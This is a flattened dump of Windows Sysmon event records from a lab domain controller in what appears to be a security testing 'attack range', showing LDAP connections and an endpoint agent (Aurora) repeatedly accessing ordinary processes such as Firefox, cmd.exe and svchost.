AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56391-false10.0.1.14win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000044627Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:32.959{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local56390-truefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000044626Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:32.959{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local56390-truefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local389ldap 23542300x800000000000000044625Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:34.910{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=556C8704CF16EACF4D868CB404B0FF58,SHA256=A20E7E26A77F5CE75558C9DFF9042E93D43AC447B6455F51ACB221763C1927B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000044624Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:34.808{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-5006-00000000AF02}3588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044623Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:34.806{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-4F06-00000000AF02}5500C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044622Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:34.803{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-4E06-00000000AF02}5088C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044621Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:34.801{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4D06-00000000AF02}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044620Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:34.798{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4C06-00000000AF02}292C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044619Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:34.796{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4B06-00000000AF02}500C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044618Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:34.794{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4A06-00000000AF02}1884C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044617Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:34.788{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4906-00000000AF02}6604C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044616Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:34.776{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044615Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:34.769{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044614Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:34.764{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044613Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:34.752{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044612Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:34.751{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044611Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:34.750{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044610Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:34.750{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044609Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:34.749{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044608Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:34.742{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044607Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:34.731{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044606Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:34.707{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044605Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:34.700{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044604Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:34.692{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044603Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:34.688{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044602Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:34.686{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044601Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:34.683{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044600Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:34.680{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044599Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:34.677{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044598Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:34.676{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044597Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:34.672{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044596Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:34.672{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 